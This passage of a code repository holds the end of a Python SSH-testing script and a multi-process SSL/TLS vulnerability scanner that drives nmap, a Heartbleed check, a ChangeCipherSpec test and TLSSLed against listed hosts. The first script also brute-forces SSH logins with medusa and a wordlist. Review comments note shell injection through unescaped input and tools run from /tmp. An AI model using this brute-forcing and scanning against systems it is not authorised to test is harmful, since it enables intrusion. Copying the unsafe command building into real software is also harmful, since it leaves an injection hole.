        # into a shell command line unescaped (see RunCommand).
        fullCmd="nmap -sT --script=sshv1 -h "+host[0]+" -p "+host[1]
        if quiet==False:
            print fullCmd
        jobs.append((jobid,host[0],fullCmd))
        jobid = jobid+1
    resultsList = execute1(jobs,numProcesses)
    for i in resultsList:
        if "Server supports SSHv1" in str(i):
            # NOTE(review): `line` is not assigned in this function.  At runtime
            # it resolves to the module-global `line` left behind by the
            # file-reading loop in __main__ (the last input line), so this does
            # not print the matching result; presumably i[1] or i[2] was meant.
            print line
    #End of Module

    #Start of Module
    results = "\n- Bruteforcing SSH Servers with Medusa"
    print results
    jobs = []
    jobid = 0

    # One medusa run per target using the wordlist from toolsPath; every
    # output line is printed as-is.
    for host in sslList:
        fullCmd="medusa -M ssh -C "+toolsPath+"wordList_ssh.txt -h "+host[0]+" -p "+host[1]+" -T4 -t4 -f -F"
        if quiet==False:
            print fullCmd
        jobs.append((jobid,host[0],fullCmd))
        jobid = jobid+1
    resultsList = execute1(jobs,numProcesses)
    for i in resultsList:
        resultsList1 = i[2].split("\n")
        for line in resultsList1:
            line = line.strip()
            print line
    #End of Module


if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('-quiet', action='store_true', help='[only show results]')
    parser.add_argument('-file', dest='filename', action='store', help='[file containing IPs and Ports]')
    parser.add_argument('-threads', dest='numProcesses', action='store', help='[number of threads]')

    if len(sys.argv)==1:
        parser.print_help()
        sys.exit(1)

    options = parser.parse_args()

    downloadFiles()

    # Assigned at module level, so runModules() sees the new value.
    if options.numProcesses:
        numProcesses=int(options.numProcesses)
    else:
        numProcesses=int(10)
    if not options.filename:
        parser.print_help()
        sys.exit(1)
    else:
        # Input file: one "host:port" per line.  A blank line or a line
        # without a colon raises IndexError on line1[1].  `line` is left as a
        # module global after this loop.
        with open(options.filename) as f:
            for line in f:
                line = line.strip()
                line1 = line.split(":")
                hostNo = line1[0]
                hostPort = line1[1]
                sslList.append((hostNo,hostPort))

    if options.quiet:
        runModules(quiet=True)
    else:
        runModules(quiet=False)
--------------------------------------------------------------------------------
/runSSLmulti.py:
--------------------------------------------------------------------------------
#! /usr/bin/env python

from multiprocessing import Queue
import multiprocessing
import commands
import sys
import argparse
import os

origPath = os.getcwd()
# External tools (OSSL_CCS_InjectTest.py, TLSSLed_v1.3.sh) are executed from
# this directory.
# Security note: /tmp is writable by every local user, so another local user
# could replace those files and have this script execute them.  Prefer a
# directory owned by the invoking user with restrictive permissions.
toolsPath = "/tmp/tools"
tlssledPath = toolsPath+"/"
numProcesses = 10

def RunCommand(fullCmd):
    """Run fullCmd through the shell and return its combined stdout/stderr.

    commands.getoutput() goes through /bin/sh, so any host/port text the
    caller splices into fullCmd (it comes from the input file) is
    interpreted by the shell unescaped.  The bare except also swallows
    KeyboardInterrupt and hides the real error behind a generic string.
    """
    try:
        return commands.getoutput(fullCmd)
    except:
        return "Error executing command %s" %(fullCmd)
class Worker1(multiprocessing.Process):
    """Worker process that drains (jobid, hostNo, runCmd) jobs from work_queue.

    For each job it runs runCmd via RunCommand() and puts
    (jobid, hostNo, output) on result_queue.
    """

    def __init__(self,
                 work_queue,
                 result_queue,
                 ):
        multiprocessing.Process.__init__(self)
        self.work_queue = work_queue
        self.result_queue = result_queue
        # Checked by run(); nothing in this chunk ever sets it to True.
        self.kill_received = False
    def run(self):
        # multiprocessing.Queue.empty() is documented as unreliable, so the
        # loop really ends when get_nowait() raises (expected: Queue.Empty;
        # the bare except catches everything else as well).
        while (not (self.kill_received)) and (self.work_queue.empty()==False):
            try:
                job = self.work_queue.get_nowait()
            except:
                break
            (jobid,hostNo,runCmd) = job
            rtnVal = (jobid,hostNo,RunCommand(runCmd))
            self.result_queue.put(rtnVal)

def execute1(jobs, num_processes=2):
    """Run every job in jobs across num_processes Worker1 processes.

    jobs: list of (jobid, hostNo, runCmd) tuples.
    Returns the (jobid, hostNo, output) tuples sorted by jobid.  Blocks
    until one result per job has been read; the workers are started but
    never joined.  num_processes must be an int (it is passed to range()).
    """
    work_queue = multiprocessing.Queue()
    for job in jobs:
        work_queue.put(job)

    result_queue = multiprocessing.Queue()
    worker = []
    for i in range(num_processes):
        worker.append(Worker1(work_queue, result_queue))
        worker[i].start()

    results = []
    while len(results) < len(jobs):
        result = result_queue.get()
        results.append(result)
    results.sort()
    return (results)
os.chdir(origPath)

# (host, port) tuples read from the -file argument.
sslList=[]

def runModules(quiet):
    """Run the SSL/TLS checks against every (host, port) in the module-global sslList.

    quiet: when False, each command line is printed before it is run.
    Reads the module globals sslList, numProcesses, toolsPath and
    tlssledPath.  Each "Module" below builds one command per target, runs
    them through execute1() and prints the lines of interest.
    """
    #Start of Module
    results = "\n- Checking for SSLv2"
    print results
    jobs = []
# --- continuation of runModules(quiet) in runSSLmulti.py; its header is on the preceding line of this chunk ---
    jobid = 0

    for host in sslList:
        # host[0]/host[1] come straight from the input file and are spliced
        # into a shell command line unescaped (see RunCommand).
        fullCmd = "nmap -sV -sC "+host[0]+" -p "+host[1]
        if quiet==False:
            print fullCmd
        jobs.append((jobid,host[0],fullCmd))
        jobid = jobid+1
    resultsList = execute1(jobs,numProcesses)
    for i in resultsList:
        if "SSLv2 supported" in str(i):
            # NOTE(review): `line` is not assigned in this function.  At runtime
            # it resolves to the module-global `line` left behind by the
            # file-reading loop in __main__ (the last input line), so this does
            # not print the matching result; presumably i[1] or i[2] was meant.
            print line
    #End of Module

    #Start of Module
    results = "\n- Checking for Known SSL Keys"
    print results
    jobs = []
    jobid = 0

    for host in sslList:
        fullCmd = "nmap --script ssl-known-key "+host[0]+" -p "+host[1]
        if quiet==False:
            print fullCmd
        jobs.append((jobid,host[0],fullCmd))
        jobid = jobid+1
    resultsList = execute1(jobs,numProcesses)
    for i in resultsList:
        resultsList1 = i[2].split("\n")
        tempTitle = ""
        for line in resultsList1:
            line = line.strip()
            if "ssl-known-key" in line:
                print line
    #End of Module

    #Start of Module
    results = "\n- Checking for SSL ChangeCipherSpec flaw"
    print results
    jobs = []
    jobid = 0

    # Runs a script out of toolsPath (see the security note on toolsPath).
    for host in sslList:
        fullCmd = "python "+toolsPath+"/OSSL_CCS_InjectTest.py "+host[0]+" "+host[1]
        if quiet==False:
            print fullCmd
        jobs.append((jobid,host[0],fullCmd))
        jobid = jobid+1
    resultsList = execute1(jobs,numProcesses)
    for i in resultsList:
        resultsList1 = i[2].split("\n")
        tempTitle = ""
        for line in resultsList1:
            line = line.strip()
            if "may allow early" in line:
                print line
    #End of Module

    #Start of Module
    results = "\n- Running Nmap Heartbleed Module"
    print results
    jobs = []
    jobid = 0

    for host in sslList:
        fullCmd = "nmap -p "+host[1]+" --script ssl-heartbleed "+host[0]
        if quiet==False:
            print fullCmd
        jobs.append((jobid,host[0],fullCmd))
        jobid = jobid+1
    resultsList = execute1(jobs,numProcesses)
    for i in resultsList:
        resultsList1 = i[2].split("\n")
        # The whole nmap output is printed unless it mentions an error or a
        # filtered port anywhere (the match is on the full result tuple).
        if "error" not in str(i).lower() and "filtered" not in str(i).lower():
            for x in resultsList1:
                print x
    #End of Module

    #Start of Module
    results = "\n- Running Tlssled"
    print results
    jobs = []
    jobid = 0

    # Runs a shell script out of tlssledPath (see the security note on toolsPath).
    for host in sslList:
        fullCmd = tlssledPath+"TLSSLed_v1.3.sh "+host[0]+" "+host[1]
        if quiet==False:
            print fullCmd
        jobs.append((jobid,host[0],fullCmd))
        jobid = jobid+1
    resultsList = execute1(jobs,numProcesses)
    insecureSSLList=[]

    for i in resultsList:
        resultsList1 = i[2].split("\n")
        # tempTitle holds the last "Running sslscan on ..." line; count==1
        # means that title has not yet been written to insecureSSLList, so it
        # is emitted once, before the first weak-cipher line that follows it.
        tempTitle = ""
        count=0

        for line in resultsList1:
            line = line.strip()
            if "Running sslscan on" in line:
                tempTitle = line
                count=1
            if "40 bits" in line or "56 bits" in line:
                if count==1:
                    insecureSSLList.append(tempTitle)
                    count=0
                insecureSSLList.append(line)
            if "Secure Renegotiation IS supported" in line:
                print "\n"+tempTitle
                print "- Secure SSL/TLS renegotiation"
                print line
            if "(CI) SSL/TLS renegotiation IS enabled" in line:
                print "- Insecure SSL/TLS renegotiation"
                print line
            if " SSLv3" in line and "CBC" in line:
                print line

    #End of Module
    print "\nWeak 40bits or 56bits TLS/SSL Ciphers"
    for item in insecureSSLList:
        print item

    #Start of Module
    results = "\n- Getting Common Names from SSL Certificates"
    print results
    jobs = []
    jobid = 0

    for host in sslList:
        fullCmd = "nmap --script=ssl-cert -p "+host[1]+" "+host[0]
        if quiet==False:
            print fullCmd
        jobs.append((jobid,host[0],fullCmd))
        jobid = jobid+1
    resultsList = execute1(jobs,numProcesses)
    print "\n"
    for i in resultsList:
        resultsList1 = i[2].split("\n")
        for x in resultsList1:
            # Wildcard certificates ("*.") are skipped.
            if "| ssl-cert: Subject: commonName=" in x and "*." not in x:
                hostName = x.replace("| ssl-cert: Subject: commonName=","").split("/")[0]
                # NOTE(review): `host` is the leftover variable from the jobs loop
                # above (always the last entry of sslList), so every common name
                # is attributed to that one host; i[1] holds the host of this
                # result.
                print host[0]+"\t"+hostName
    #End of Module

if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('-quiet', action='store_true', help='[only show results]')
    parser.add_argument('-file', dest='filename', action='store', help='[file containing IPs and Ports]')
    parser.add_argument('-threads', dest='numProcesses', action='store', help='[number of threads]')

    if len(sys.argv)==1:
        parser.print_help()
        sys.exit(1)

    options = parser.parse_args()
    # Assigned at module level, so runModules() sees the new value.
    if options.numProcesses:
        numProcesses=int(options.numProcesses)
    else:
        numProcesses=int(10)
    if not options.filename:
        parser.print_help()
        sys.exit(1)
    else:
        # Input file: one "host:port" per line.  A blank line or a line
        # without a colon raises IndexError on line1[1].  `line` is left as a
        # module global after this loop.
        with open(options.filename) as f:
            for line in f:
                line = line.strip()
                line1 = line.split(":")
                hostNo = line1[0]
                hostPort = line1[1]
                sslList.append((hostNo,hostPort))

    if options.quiet:
        runModules(quiet=True)
    else:
        runModules(quiet=False)
--------------------------------------------------------------------------------